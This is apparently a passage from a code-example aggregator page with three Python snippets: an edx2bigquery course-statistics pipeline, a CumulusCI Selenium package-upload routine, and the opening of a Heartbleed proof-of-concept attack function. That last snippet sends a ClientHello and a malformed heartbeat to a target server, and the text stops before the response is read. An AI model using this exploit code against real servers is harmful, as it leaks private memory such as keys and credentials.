        raise RuntimeError('Failed%s' % t)
    print('Success%s' % t)

Example 18

Project: edx2bigquery Source File: analyze_content.py
def analyze_course_content(course_id, 
                           listings_file=None,
                           basedir="X-Year-2-data-sql", 
                           datedir="2013-09-21", 
                           use_dataset_latest=False,
                           do_upload=False,
                           courses=None,
                           verbose=True,
                           pin_date=None,
                           ):
    '''
    Compute course_content table, which quantifies:

    - number of chapter, sequential, vertical modules
    - number of video modules
    - number of problem, *openended, mentoring modules
    - number of dicussion, annotatable, word_cloud modules

    Do this using the course "xbundle" file, produced when the course axis is computed.

    Include only modules which had nontrivial use, to rule out the staff and un-shown content. 
    Do the exclusion based on count of module appearing in the studentmodule table, based on 
    stats_module_usage for each course.

    Also, from the course listings file, compute the number of weeks the course was open.

    If do_upload (triggered by --force-recompute) then upload all accuemulated data to the course report dataset 
    as the "stats_course_content" table.  Also generate a "course_summary_stats" table, stored in the
    course_report_ORG or course_report_latest dataset.  The course_summary_stats table combines
    data from many reports,, including stats_course_content, the medians report, the listings file,
    broad_stats_by_course, and time_on_task_stats_by_course.
    
    '''

    if do_upload:
        if use_dataset_latest:
            org = "latest"
        else:
            org = courses[0].split('/',1)[0]	# extract org from first course_id in courses

        crname = 'course_report_%s' % org

        gspath = gsutil.gs_path_from_course_id(crname)
        gsfnp = gspath / CCDATA
        gsutil.upload_file_to_gs(CCDATA, gsfnp)
        tableid = "stats_course_content"
        dataset = crname

        mypath = os.path.dirname(os.path.realpath(__file__))
        SCHEMA_FILE = '%s/schemas/schema_content_stats.json' % mypath

        try:
            the_schema = json.loads(open(SCHEMA_FILE).read())[tableid]
        except Exception as err:
            print "Oops!  Failed to load schema file for %s.  Error: %s" % (tableid, str(err))
            raise

        if 0:
            bqutil.load_data_to_table(dataset, tableid, gsfnp, the_schema, wait=True, verbose=False,
                                      format='csv', skiprows=1)

        table = 'course_metainfo'
        course_tables = ',\n'.join([('[%s.course_metainfo]' % bqutil.course_id2dataset(x)) for x in courses])
        sql = "select * from {course_tables}".format(course_tables=course_tables)
        print "--> Creating %s.%s using %s" % (dataset, table, sql)

        if 1:
            metainfo_dataset = bqutil.get_bq_table(dataset, table, sql=sql, 
                                          newer_than=datetime.datetime(2015, 1, 16, 3, 0),
                                          )
            # bqutil.create_bq_table(dataset, table, sql, overwrite=True)


        #-----------------------------------------------------------------------------
        # make course_summary_stats table
        #
        # This is a combination of the broad_stats_by_course table (if that exists), and course_metainfo.
        # Also use (and create if necessary) the nregistered_by_wrap table.

        # get the broad_stats_by_course data
        bsbc = bqutil.get_table_data(dataset, 'broad_stats_by_course')

        table_list = bqutil.get_list_of_table_ids(dataset)

        latest_person_course = max([ x for x in table_list if x.startswith('person_course_')])
        print "Latest person_course table in %s is %s" % (dataset, latest_person_course)
        
        sql = """
                SELECT pc.course_id as course_id, 
                    cminfo.wrap_date as wrap_date,
                    count(*) as nregistered,
                    sum(case when pc.start_time < cminfo.wrap_date then 1 else 0 end) nregistered_by_wrap,
                    sum(case when pc.start_time < cminfo.wrap_date then 1 else 0 end) / nregistered * 100 nregistered_by_wrap_pct,
                FROM
                    [{dataset}.{person_course}] as pc
                left join (
                 SELECT course_id,
                      TIMESTAMP(concat(wrap_year, "-", wrap_month, '-', wrap_day, ' 23:59:59')) as wrap_date,
                 FROM (
                  SELECT course_id, 
                    regexp_extract(value, r'(\d+)/\d+/\d+') as wrap_month,
                    regexp_extract(value, r'\d+/(\d+)/\d+') as wrap_day,
                    regexp_extract(value, r'\d+/\d+/(\d+)') as wrap_year,
                  FROM [{dataset}.course_metainfo]
                  where key='listings_Course Wrap'
                 )) as cminfo
                on pc.course_id = cminfo.course_id
                
                group by course_id, wrap_date
                order by course_id
        """.format(dataset=dataset, person_course=latest_person_course)

        nr_by_wrap = bqutil.get_bq_table(dataset, 'nregistered_by_wrap', sql=sql, key={'name': 'course_id'})

        # rates for registrants before and during course
        
        sql = """
                SELECT 
                    *,
                    ncertified / nregistered * 100 as pct_certified_of_reg,
                    ncertified_and_registered_before_launch / nregistered_before_launch * 100 as pct_certified_reg_before_launch,
                    ncertified_and_registered_during_course / nregistered_during_course * 100 as pct_certified_reg_during_course,
                    ncertified / nregistered_by_wrap * 100 as pct_certified_of_reg_by_wrap,
                    ncertified / nviewed * 100 as pct_certified_of_viewed,
                    ncertified / nviewed_by_wrap * 100 as pct_certified_of_viewed_by_wrap,
                    ncertified_by_ewrap / nviewed_by_ewrap * 100 as pct_certified_of_viewed_by_ewrap,
                FROM
                (
                # ------------------------
                # get aggregate data
                SELECT pc.course_id as course_id, 
                    cminfo.wrap_date as wrap_date,
                    count(*) as nregistered,
                    sum(case when pc.certified then 1 else 0 end) ncertified,
                    sum(case when (TIMESTAMP(pc.cert_created_date) < cminfo.ewrap_date) and (pc.certified and pc.viewed) then 1 else 0 end) ncertified_by_ewrap,
                    sum(case when pc.viewed then 1 else 0 end) nviewed,
                    sum(case when pc.start_time < cminfo.wrap_date then 1 else 0 end) nregistered_by_wrap,
                    sum(case when pc.start_time < cminfo.wrap_date then 1 else 0 end) / nregistered * 100 nregistered_by_wrap_pct,
                    sum(case when (pc.start_time < cminfo.wrap_date) and pc.viewed then 1 else 0 end) nviewed_by_wrap,
                    sum(case when (pc.start_time < cminfo.ewrap_date) and pc.viewed then 1 else 0 end) nviewed_by_ewrap,
                    sum(case when pc.start_time < cminfo.launch_date then 1 else 0 end) nregistered_before_launch,
                    sum(case when pc.start_time < cminfo.launch_date 
                              and pc.certified
                              then 1 else 0 end) ncertified_and_registered_before_launch,
                    sum(case when (pc.start_time >= cminfo.launch_date) 
                              and (pc.start_time < cminfo.wrap_date) then 1 else 0 end) nregistered_during_course,
                    sum(case when (pc.start_time >= cminfo.launch_date) 
                              and (pc.start_time < cminfo.wrap_date) 
                              and pc.certified
                              then 1 else 0 end) ncertified_and_registered_during_course,
                FROM
                    [{dataset}.{person_course}] as pc
                left join (
                
                # --------------------
                #  get course launch and wrap dates from course_metainfo

       SELECT AA.course_id as course_id, 
              AA.wrap_date as wrap_date,
              AA.launch_date as launch_date,
              BB.ewrap_date as ewrap_date,
       FROM (
               #  inner get course launch and wrap dates from course_metainfo
                SELECT A.course_id as course_id,
                  A.wrap_date as wrap_date,
                  B.launch_date as launch_date,
                from
                (
                 SELECT course_id,
                      TIMESTAMP(concat(wrap_year, "-", wrap_month, '-', wrap_day, ' 23:59:59')) as wrap_date,
                 FROM (
                  SELECT course_id, 
                    regexp_extract(value, r'(\d+)/\d+/\d+') as wrap_month,
                    regexp_extract(value, r'\d+/(\d+)/\d+') as wrap_day,
                    regexp_extract(value, r'\d+/\d+/(\d+)') as wrap_year,
                  FROM [{dataset}.course_metainfo]
                  where key='listings_Course Wrap'
                 )
                ) as A
                left outer join 
                (
                 SELECT course_id,
                      TIMESTAMP(concat(launch_year, "-", launch_month, '-', launch_day)) as launch_date,
                 FROM (
                  SELECT course_id, 
                    regexp_extract(value, r'(\d+)/\d+/\d+') as launch_month,
                    regexp_extract(value, r'\d+/(\d+)/\d+') as launch_day,
                    regexp_extract(value, r'\d+/\d+/(\d+)') as launch_year,
                  FROM [{dataset}.course_metainfo]
                  where key='listings_Course Launch'
                 )
                ) as B
                on A.course_id = B.course_id 
                # end inner course_metainfo subquery
            ) as AA
            left outer join
            (
                 SELECT course_id,
                      TIMESTAMP(concat(wrap_year, "-", wrap_month, '-', wrap_day, ' 23:59:59')) as ewrap_date,
                 FROM (
                  SELECT course_id, 
                    regexp_extract(value, r'(\d+)/\d+/\d+') as wrap_month,
                    regexp_extract(value, r'\d+/(\d+)/\d+') as wrap_day,
                    regexp_extract(value, r'\d+/\d+/(\d+)') as wrap_year,
                  FROM [{dataset}.course_metainfo]
                  where key='listings_Empirical Course Wrap'
                 )
            ) as BB
            on AA.course_id = BB.course_id

                # end course_metainfo subquery
                # --------------------
                
                ) as cminfo
                on pc.course_id = cminfo.course_id
                
                group by course_id, wrap_date
                order by course_id
                # ---- end get aggregate data
                )
                order by course_id
        """.format(dataset=dataset, person_course=latest_person_course)

        print "--> Assembling course_summary_stats from %s" % 'stats_cert_rates_by_registration'
        sys.stdout.flush()
        cert_by_reg = bqutil.get_bq_table(dataset, 'stats_cert_rates_by_registration', sql=sql, 
                                          newer_than=datetime.datetime(2015, 1, 16, 3, 0),
                                          key={'name': 'course_id'})

        # start assembling course_summary_stats

        c_sum_stats = defaultdict(OrderedDict)
        for entry in bsbc['data']:
            course_id = entry['course_id']
            cmci = c_sum_stats[course_id]
            cmci.update(entry)
            cnbw = nr_by_wrap['data_by_key'][course_id]
            nbw = int(cnbw['nregistered_by_wrap'])
            cmci['nbw_wrap_date'] = cnbw['wrap_date']
            cmci['nregistered_by_wrap'] = nbw
            cmci['nregistered_by_wrap_pct'] = cnbw['nregistered_by_wrap_pct']
            cmci['frac_female'] = float(entry['n_female_viewed']) / (float(entry['n_male_viewed']) + float(entry['n_female_viewed']))
            ncert = float(cmci['certified_sum'])
            if ncert:
                cmci['certified_of_nregistered_by_wrap_pct'] = nbw / ncert * 100.0
            else:
                cmci['certified_of_nregistered_by_wrap_pct'] = None
            cbr = cert_by_reg['data_by_key'][course_id]
            for field, value in cbr.items():
                cmci['cbr_%s' % field] = value

        # add medians for viewed, explored, and certified

        msbc_tables = {'msbc_viewed': "viewed_median_stats_by_course",
                       'msbc_explored': 'explored_median_stats_by_course',
                       'msbc_certified': 'certified_median_stats_by_course',
                       'msbc_verified': 'verified_median_stats_by_course',
                       }
        for prefix, mtab in msbc_tables.items():
            print "--> Merging median stats data from %s" % mtab
            sys.stdout.flush()
            bqdat = bqutil.get_table_data(dataset, mtab)
            for entry in bqdat['data']:
                course_id = entry['course_id']
                cmci = c_sum_stats[course_id]
                for field, value in entry.items():
                    cmci['%s_%s' % (prefix, field)] = value

        # add time on task data

        tot_table = "time_on_task_stats_by_course"
        prefix = "ToT"
        print "--> Merging time on task data from %s" % tot_table
        sys.stdout.flush()
        try:
            bqdat = bqutil.get_table_data(dataset, tot_table)
        except Exception as err:
            bqdat = {'data': {}}
        for entry in bqdat['data']:
            course_id = entry['course_id']
            cmci = c_sum_stats[course_id]
            for field, value in entry.items():
                if field=='course_id':
                    continue
                cmci['%s_%s' % (prefix, field)] = value

        # add serial time on task data

        tot_table = "time_on_task_serial_stats_by_course"
        prefix = "SToT"
        print "--> Merging serial time on task data from %s" % tot_table
        sys.stdout.flush()
        try:
            bqdat = bqutil.get_table_data(dataset, tot_table)
        except Exception as err:
            bqdat = {'data': {}}
        for entry in bqdat['data']:
            course_id = entry['course_id']
            cmci = c_sum_stats[course_id]
            for field, value in entry.items():
                if field=='course_id':
                    continue
                cmci['%s_%s' % (prefix, field)] = value

        # add show_answer stats

        tot_table = "show_answer_stats_by_course"
        prefix = "SAS"
        print "--> Merging show_answer stats data from %s" % tot_table
        sys.stdout.flush()
        try:
            bqdat = bqutil.get_table_data(dataset, tot_table)
        except Exception as err:
            bqdat = {'data': {}}
        for entry in bqdat['data']:
            course_id = entry['course_id']
            cmci = c_sum_stats[course_id]
            for field, value in entry.items():
                if field=='course_id':
                    continue
                cmci['%s_%s' % (prefix, field)] = value

        # setup list of keys, for CSV output

        css_keys = c_sum_stats.values()[0].keys()

        # retrieve course_metainfo table, pivot, add that to summary_stats

        print "--> Merging course_metainfo from %s" % table
        sys.stdout.flush()
        bqdat = bqutil.get_table_data(dataset, table)

        listings_keys = map(make_key, ["Institution", "Semester", "New or Rerun", "Andrew Recodes New/Rerun", 
                                       "Course Number", "Short Title", "Andrew's Short Titles", "Title", 
                                       "Instructors", "Registration Open", "Course Launch", "Course Wrap", "course_id",
                                       "Empirical Course Wrap", "Andrew's Order", "certifies", "MinPassGrade",
                                       '4-way Category by name', "4-way (CS, STEM, HSocSciGov, HumHistRel)"
                                       ])
        listings_keys.reverse()
        
        for lk in listings_keys:
            css_keys.insert(1, "listings_%s" % lk)

        COUNTS_TO_KEEP = ['discussion', 'problem', 'optionresponse', 'checkboxgroup', 'optioninput', 
                          'choiceresponse', 'video', 'choicegroup', 'vertical', 'choice', 'sequential', 
                          'multiplechoiceresponse', 'numericalresponse', 'chapter', 'solution', 'img', 
                          'formulaequationinput', 'responseparam', 'selfassessment', 'track', 'task', 'rubric', 
                          'stringresponse', 'combinedopenended', 'description', 'textline', 'prompt', 'category', 
                          'option', 'lti', 'annotationresponse', 
                          'annotatable', 'colgroup', 'tag_prompt', 'comment', 'annotationinput', 'image', 
                          'options', 'comment_prompt', 'conditional', 
                          'answer', 'poll_question', 'section', 'wrapper', 'map', 'area', 
                          'customtag', 'transcript', 
                          'split_test', 'word_cloud', 
                          'openended', 'openendedparam', 'answer_display', 'code', 
                          'drag_and_drop_input', 'customresponse', 'draggable', 'mentoring', 
                          'textannotation', 'imageannotation', 'videosequence', 
                          'feedbackprompt', 'assessments', 'openassessment', 'assessment', 'explanation', 'criterion']

        for entry in bqdat['data']:
            thekey = make_key(entry['key'])
            # if thekey.startswith('count_') and thekey[6:] not in COUNTS_TO_KEEP:
            #     continue
            if thekey.startswith('listings_') and thekey[9:] not in listings_keys:
                # print "dropping key=%s for course_id=%s" % (thekey, entry['course_id'])
                continue
            c_sum_stats[entry['course_id']][thekey] = entry['value']
            #if 'certifies' in thekey:
            #    print "course_id=%s, key=%s, value=%s" % (entry['course_id'], thekey, entry['value'])
            if thekey not in css_keys:
                css_keys.append(thekey)

        # compute forum_posts_per_week
        for course_id, entry in c_sum_stats.items():
            nfps = entry.get('nforum_posts_sum', 0)
            if nfps:
                fppw = int(nfps) / float(entry['nweeks'])
                entry['nforum_posts_per_week'] = fppw
                print "    course: %s, assessments_per_week=%s, forum_posts_per_week=%s" % (course_id, entry['total_assessments_per_week'], fppw)
            else:
                entry['nforum_posts_per_week'] = None
        css_keys.append('nforum_posts_per_week')

        # read in listings file and merge that in also
        if listings_file:
            if listings_file.endswith('.csv'):
                listings = csv.DictReader(open(listings_file))
            else:
                listings = [ json.loads(x) for x in open(listings_file) ]
            for entry in listings:
                course_id = entry['course_id']
                if course_id not in c_sum_stats:
                    continue
                cmci = c_sum_stats[course_id]
                for field, value in entry.items():
                    lkey = "listings_%s" % make_key(field)
                    if not (lkey in cmci) or (not cmci[lkey]):
                        cmci[lkey] = value

        print "Storing these fields: %s" % css_keys

        # get schema
        mypath = os.path.dirname(os.path.realpath(__file__))
        the_schema = json.loads(open('%s/schemas/schema_combined_course_summary_stats.json' % mypath).read())
        schema_dict = { x['name'] : x for x in the_schema }

        # write out CSV
        css_table = "course_summary_stats"
        ofn = "%s__%s.csv" % (dataset, css_table)
        ofn2 = "%s__%s.json" % (dataset, css_table)
        print "Writing data to %s and %s" % (ofn, ofn2)

        ofp = open(ofn, 'w')
        ofp2 = open(ofn2, 'w')
        dw = csv.DictWriter(ofp, fieldnames=css_keys)
        dw.writeheader()
        for cid, entry in c_sum_stats.items():
            for ek in entry:
                if ek not in schema_dict:
                    entry.pop(ek)
                # entry[ek] = str(entry[ek])	# coerce to be string
            ofp2.write(json.dumps(entry) + "\n")
            for key in css_keys:
                if key not in entry:
                    entry[key] = None
            dw.writerow(entry)
        ofp.close()
        ofp2.close()

        # upload to bigquery
        # the_schema = [ { 'type': 'STRING', 'name': x } for x in css_keys ]
        if 1:
            gsfnp = gspath / dataset / (css_table + ".json")
            gsutil.upload_file_to_gs(ofn2, gsfnp)
            # bqutil.load_data_to_table(dataset, css_table, gsfnp, the_schema, wait=True, verbose=False,
            #                           format='csv', skiprows=1)
            bqutil.load_data_to_table(dataset, css_table, gsfnp, the_schema, wait=True, verbose=False)

        return

    
    print "-"*60 + " %s" % course_id

    # get nweeks from listings
    lfn = path(listings_file)
    if not lfn.exists():
        print "[analyze_content] course listings file %s doesn't exist!" % lfn
        return

    data = None
    if listings_file.endswith('.json'):
        data_feed = map(json.loads, open(lfn))
    else:
        data_feed = csv.DictReader(open(lfn))
    for k in data_feed:
        if not 'course_id' in k:
            print "Strange course listings row, no course_id in %s" % k
            raise Exception("Missing course_id")
        if k['course_id']==course_id:
            data = k
            break

    if not data:
        print "[analyze_content] no entry for %s found in course listings file %s!" % (course_id, lfn)
        return

    def date_parse(field):
        (m, d, y) = map(int, data[field].split('/'))
        return datetime.datetime(y, m, d)

    launch = date_parse('Course Launch')
    wrap = date_parse('Course Wrap')
    ndays = (wrap - launch).days
    nweeks = ndays / 7.0

    print "Course length = %6.2f weeks (%d days)" % (nweeks, ndays)

    if pin_date:
        datedir = pin_date
    course_dir = find_course_sql_dir(course_id, basedir, datedir, use_dataset_latest and not pin_date)
    cfn = gsutil.path_from_course_id(course_id)

    xbfn = course_dir / ("xbundle_%s.xml" % cfn)
    
    if not xbfn.exists():
        print "[analyze_content] cannot find xbundle file %s for %s!" % (xbfn, course_id)

        if use_dataset_latest:
            # try looking in earlier directories for xbundle file
            import glob
            spath = course_dir / ("../*/xbundle_%s.xml" % cfn)
            files = list(glob.glob(spath))
            if files:
                xbfn = path(files[-1])
            if not xbfn.exists():
                print "   --> also cannot find any %s ; aborting!" % spath
            else:
                print "   --> Found and using instead: %s " % xbfn
        if not xbfn.exists():
            raise Exception("[analyze_content] missing xbundle file %s" % xbfn)

    # if there is an xbundle*.fixed file, use that instead of the normal one
    if os.path.exists(str(xbfn) + ".fixed"):
        xbfn = path(str(xbfn) + ".fixed")

    print "[analyze_content] For %s using %s" % (course_id, xbfn)
    
    # get module usage data
    mudata = get_stats_module_usage(course_id, basedir, datedir, use_dataset_latest)

    xml = etree.parse(open(xbfn)).getroot()
    
    counts = defaultdict(int)
    nexcluded = defaultdict(int)

    IGNORE = ['html', 'p', 'div', 'iframe', 'ol', 'li', 'ul', 'blockquote', 'h1', 'em', 'b', 'h2', 'h3', 'body', 'span', 'strong',
              'a', 'sub', 'strike', 'table', 'td', 'tr', 's', 'tbody', 'sup', 'sub', 'strike', 'i', 's', 'pre', 'policy', 'metadata',
              'grading_policy', 'br', 'center',  'wiki', 'course', 'font', 'tt', 'it', 'dl', 'startouttext', 'endouttext', 'h4', 
              'head', 'source', 'dt', 'hr', 'u', 'style', 'dd', 'script', 'th', 'p', 'P', 'TABLE', 'TD', 'small', 'text', 'title']

    problem_stats = defaultdict(int)

    def does_problem_have_random_script(problem):
        '''
        return 1 if problem has a script with "random." in it
        else return 0
        '''
        for elem in problem.findall('.//script'):
            if elem.text and ('random.' in elem.text):
                return 1
        return 0

    # walk through xbundle 
    def walk_tree(elem, policy=None):
        '''
        Walk XML tree recursively.
        elem = current element
        policy = dict of attributes for children to inherit, with fields like due, graded, showanswer
        '''
        policy = policy or {}
        if  type(elem.tag)==str and (elem.tag.lower() not in IGNORE):
            counts[elem.tag.lower()] += 1
        if elem.tag in ["sequential", "problem", "problemset", "course", "chapter"]:	# very old courses may use inheritance from course & chapter
            keys = ["due", "graded", "format", "showanswer", "start"]
            for k in keys:		# copy inheritable attributes, if they are specified
                val = elem.get(k)
                if val:
                    policy[k] = val
        if elem.tag=="problem":	# accuemulate statistics about problems: how many have show_answer = [past_due, closed] ?  have random. in script?
            problem_stats['n_capa_problems'] += 1
            if policy.get('showanswer'):
                problem_stats["n_showanswer_%s" % policy.get('showanswer')] += 1
            else:
                problem_stats['n_shownanswer_finished'] += 1	# DEFAULT showanswer = finished  (make sure this remains true)
                # see https://github.com/edx/edx-platform/blob/master/common/lib/xmodule/xmodule/capa_base.py#L118
                # finished = Show the answer after the student has answered the problem correctly, the student has no attempts left, or the problem due date has passed.
            problem_stats['n_random_script'] += does_problem_have_random_script(elem)

            if policy.get('graded')=='true' or policy.get('graded')=='True':
                problem_stats['n_capa_problems_graded'] += 1
                problem_stats['n_graded_random_script'] += does_problem_have_random_script(elem)
                if policy.get('showanswer'):
                    problem_stats["n_graded_showanswer_%s" % policy.get('showanswer')] += 1
                else:
                    problem_stats['n_graded_shownanswer_finished'] += 1	# DEFAULT showanswer = finished  (make sure this remains true)
            
        for k in elem:
            midfrag = (k.tag, k.get('url_name_orig', None))
            if (midfrag in mudata) and int(mudata[midfrag]['ncount']) < 20:
                nexcluded[k.tag] += 1
                if verbose:
                    try:
                        print "    -> excluding %s (%s), ncount=%s" % (k.get('display_name', '<no_display_name>').encode('utf8'), 
                                                                       midfrag, 
                                                                       mudata.get(midfrag, {}).get('ncount'))
                    except Exception as err:
                        print "    -> excluding ", k
                continue
            walk_tree(k, policy.copy())

    walk_tree(xml)
    print "--> Count of individual element tags throughout XML: ", counts
    
    print "--> problem_stats:", json.dumps(problem_stats, indent=4)

    # combine some into "qual_axis" and others into "quant_axis"
    qual_axis = ['openassessment', 'optionresponse', 'multiplechoiceresponse', 
                 # 'discussion', 
                 'choiceresponse', 'word_cloud', 
                 'combinedopenended', 'choiceresponse', 'stringresponse', 'textannotation', 'openended', 'lti']
    quant_axis = ['formularesponse', 'numericalresponse', 'customresponse', 'symbolicresponse', 'coderesponse',
                  'imageresponse']

    nqual = 0
    nquant = 0
    for tag, count in counts.items():
        if tag in qual_axis:
            nqual += count
        if tag in quant_axis:
            nquant += count
    
    print "nqual=%d, nquant=%d" % (nqual, nquant)

    nqual_per_week = nqual / nweeks
    nquant_per_week = nquant / nweeks
    total_per_week = nqual_per_week + nquant_per_week

    print "per week: nqual=%6.2f, nquant=%6.2f total=%6.2f" % (nqual_per_week, nquant_per_week, total_per_week)

    # save this overall data in CCDATA
    lock_file(CCDATA)
    ccdfn = path(CCDATA)
    ccd = {}
    if ccdfn.exists():
        for k in csv.DictReader(open(ccdfn)):
            ccd[k['course_id']] = k
    
    ccd[course_id] = {'course_id': course_id,
                      'nweeks': nweeks,
                      'nqual_per_week': nqual_per_week,
                      'nquant_per_week': nquant_per_week,
                      'total_assessments_per_week' : total_per_week,
                      }

    # fields = ccd[ccd.keys()[0]].keys()
    fields = ['course_id', 'nquant_per_week', 'total_assessments_per_week', 'nqual_per_week', 'nweeks']
    cfp = open(ccdfn, 'w')
    dw = csv.DictWriter(cfp, fieldnames=fields)
    dw.writeheader()
    for cid, entry in ccd.items():
        dw.writerow(entry)
    cfp.close()
    lock_file(CCDATA, release=True)

    # store data in course_metainfo table, which has one (course_id, key, value) on each line
    # keys include nweeks, nqual, nquant, count_* for module types *

    cmfields = OrderedDict()
    cmfields['course_id'] = course_id
    cmfields['course_length_days'] = str(ndays)
    cmfields.update({ make_key('listings_%s' % key) : value for key, value in data.items() })	# from course listings
    cmfields.update(ccd[course_id].copy())

    # cmfields.update({ ('count_%s' % key) : str(value) for key, value in counts.items() })	# from content counts

    cmfields['filename_xbundle'] = xbfn
    cmfields['filename_listings'] = lfn

    for key in sorted(counts):	# store counts in sorted order, so that the later generated CSV file can have a predictable structure
        value = counts[key]
        cmfields['count_%s' % key] =  str(value) 	# from content counts

    for key in sorted(problem_stats):	# store problem stats
        value = problem_stats[key]
        cmfields['problem_stat_%s' % key] =  str(value)

    cmfields.update({ ('nexcluded_sub_20_%s' % key) : str(value) for key, value in nexcluded.items() })	# from content counts

    course_dir = find_course_sql_dir(course_id, basedir, datedir, use_dataset_latest)
    csvfn = course_dir / CMINFO

    # manual overriding of the automatically computed fields can be done by storing course_id,key,value data
    # in the CMINFO_OVERRIDES file

    csvfn_overrides = course_dir / CMINFO_OVERRIDES
    if csvfn_overrides.exists():
        print "--> Loading manual override information from %s" % csvfn_overrides
        for ovent in csv.DictReader(open(csvfn_overrides)):
            if not ovent['course_id']==course_id:
                print "===> ERROR! override file has entry with wrong course_id: %s" % ovent
                continue
            print "    overriding key=%s with value=%s" % (ovent['key'], ovent['value'])
            cmfields[ovent['key']] = ovent['value']

    print "--> Course metainfo writing to %s" % csvfn

    fp = open(csvfn, 'w')

    cdw = csv.DictWriter(fp, fieldnames=['course_id', 'key', 'value'])
    cdw.writeheader()

    for k, v in cmfields.items():
        cdw.writerow({'course_id': course_id, 'key': k, 'value': v})
        
    fp.close()

    # build and output course_listings_and_metainfo 

    dataset = bqutil.course_id2dataset(course_id, use_dataset_latest=use_dataset_latest)

    mypath = os.path.dirname(os.path.realpath(__file__))
    clm_table = "course_listing_and_metainfo"
    clm_schema_file = '%s/schemas/schema_%s.json' % (mypath, clm_table)
    clm_schema = json.loads(open(clm_schema_file).read())

    clm = {}
    for finfo in clm_schema:
        field = finfo['name']
        clm[field] = cmfields.get(field)
    clm_fnb = clm_table + ".json"
    clm_fn = course_dir / clm_fnb
    open(clm_fn, 'w').write(json.dumps(clm))

    gsfnp = gsutil.gs_path_from_course_id(course_id, use_dataset_latest=use_dataset_latest) / clm_fnb
    print "--> Course listing + metainfo uploading to %s then to %s.%s" % (gsfnp, dataset, clm_table)
    sys.stdout.flush()
    gsutil.upload_file_to_gs(clm_fn, gsfnp)
    bqutil.load_data_to_table(dataset, clm_table, gsfnp, clm_schema, wait=True, verbose=False)

    # output course_metainfo

    table = 'course_metainfo'
    dataset = bqutil.course_id2dataset(course_id, use_dataset_latest=use_dataset_latest)

    gsfnp = gsutil.gs_path_from_course_id(course_id, use_dataset_latest=use_dataset_latest) / CMINFO
    print "--> Course metainfo uploading to %s then to %s.%s" % (gsfnp, dataset, table)
    sys.stdout.flush()

    gsutil.upload_file_to_gs(csvfn, gsfnp)

    mypath = os.path.dirname(os.path.realpath(__file__))
    SCHEMA_FILE = '%s/schemas/schema_course_metainfo.json' % mypath
    the_schema = json.loads(open(SCHEMA_FILE).read())[table]

    bqutil.load_data_to_table(dataset, table, gsfnp, the_schema, wait=True, verbose=False, format='csv', skiprows=1)

Example 19

Project: CumulusCI Source File: package_upload_ss.py
    def build_package(self, build_name):
        """ Builds a managed package by calling SauceLabs via Selenium to click the Upload button """ 
        # Update Status
        print 'Starting browser'
        sys.stdout.flush()

        try:
            self.driver = self.get_selenium()
        except:
            print "Sleeping 5 more seconds to try again.  Last attempt to connect to Selenium failed"
            sleep(5)
            self.driver = self.get_selenium()

        self.driver.implicitly_wait(90) # seconds

        # Load the packages list page
        self.driver.get('%s/0A2' % self.instance_url)

        # Update Status
        print 'Loaded package listing page'
        sys.stdout.flush()

        # Click the link to the package
        self.driver.find_element_by_xpath("//th[contains(@class,'dataCell')]/a[text()='%s']" % self.package).click()

        # Update Status
        print 'Loaded package page'
        sys.stdout.flush()

        # Click the Upload button to open the upload form
        self.driver.find_element_by_xpath("//input[@class='btn' and @value='Upload']").click()

        # Update Status
        print 'Loaded Upload form'
        sys.stdout.flush()

        # Populate and submit the upload form to create a beta managed package
        name_input = self.driver.find_element_by_id('ExportPackagePage:UploadPackageForm:PackageDetailsPageBlock:PackageDetailsBlockSection:VersionInfoSectionItem:VersionText')
        name_input.clear()
        name_input.send_keys(build_name)
        self.driver.find_element_by_id('ExportPackagePage:UploadPackageForm:PackageDetailsPageBlock:PackageDetailsPageBlockButtons:bottom:upload').click()

        # Update Status
        print 'Upload Submitted'
        sys.stdout.flush()

        # Monitor the package upload progress
        retry_count = 0
        last_status = None
        while True:
            try:
                status_message = self.driver.find_element_by_css_selector('.messageText').text
            except selenium.common.exceptions.StaleElementReferenceException:
                # These come up, possibly if you catch the page in the middle of updating the text via javascript
                sleep(1)
                continue
            except selenium.common.exceptions.NoSuchElementException:
                # These come up, possibly if you catch the page in the middle of updating the text via javascript
                if retry_count > 15:
                    print ".messageText not found after 15 retries"
                    break
                sleep(1)
                retry_count += 1
                continue

            retry_count = 0

            if status_message.startswith('Upload Complete'):
                # Update Status
                print status_message
                sys.stdout.flush()
    
                # Get the version number and install url
                version = self.driver.find_element_by_xpath("//th[text()='Version Number']/following-sibling::td/span").text
                install_url = self.driver.find_element_by_xpath("//a[contains(@name, ':pkgInstallUrl')]").get_attribute('href')
            
                self.version = version
                self.install_url = install_url
    
                break

            if status_message.startswith('Upload Failed'):
                print status_message
                sys.stdout.flush()
                break 

            # Update Status
            if status_message != last_status:
                print status_message
                sys.stdout.flush()
            last_status = status_message

            sleep(1)

        self.driver.quit()    

Example 20

Project: PocCollect Source File: heartbleedpoc.py
def attack(ip, port, tlsversion, starttls='none', timeout=5):
    tlslongver = protocol_hex_to_name[tlsversion]
    
    if starttls == 'none':
        print '[INFO] Connecting to ' + str(ip) + ':' + str(port) + ' using ' + tlslongver
    else:
        print '[INFO] Connecting to ' + str(ip) + ':' + str(port) + ' using ' + tlslongver + ' with STARTTLS'
    sys.stdout.flush()
    
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    
    try:
        s.connect((ip, port))
        if starttls == 'smtp':
            recvall(s, buffer_size)
            s.send('ehlo ' + rand(10) + '\n')
            res = recvall(s, buffer_size)
            if not 'STARTTLS' in res:
                print >> sys.stderr, '\033[93m[ERROR] STARTTLS does not appear to be supported.\033[0m\n'
                sys.stderr.flush()
                return False
            s.send('starttls\n')
            recvall(s, buffer_size)
        elif starttls == 'pop3':
            recvall(s, buffer_size)
            s.send("STLS\n")
            recvall(s, buffer_size)
        elif starttls == 'imap':
            recvall(s, buffer_size)
            s.send("STARTTLS\n")
            recvall(s, buffer_size)
        elif starttls == 'ftp':
            recvall(s, buffer_size)
            s.send("AUTH TLS\n")
            recvall(s, buffer_size)
        
        if verbose: print '[INFO] Sending ClientHello'
        

        s.send(gen_clienthello(tlsversion))
        
        while True:
            type, version, payload = recvmsg(s, timeout)
            if type is None:
                print >> sys.stderr, '\033[93m[ERROR] The server closed the connection without sending the ServerHello. This might mean the server does not support ' + tlslongver + ' or it might not support SSL/TLS at all.\033[0m\n'
                sys.stderr.flush()
                return False
            elif type == 22 and ord(payload[-4]) == 0x0E:
                if verbose: print '[INFO] ServerHello received'
                break
        
        if verbose: print '[INFO] Sending Heartbeat'
        s.send(gen_heartbeat(tlsversion))
        
        while True:
            type, version, payload = recvmsg(s, timeout)
            if type is None:
                print '[INFO] No heartbeat response was received. The server is probably not vulnerable.'
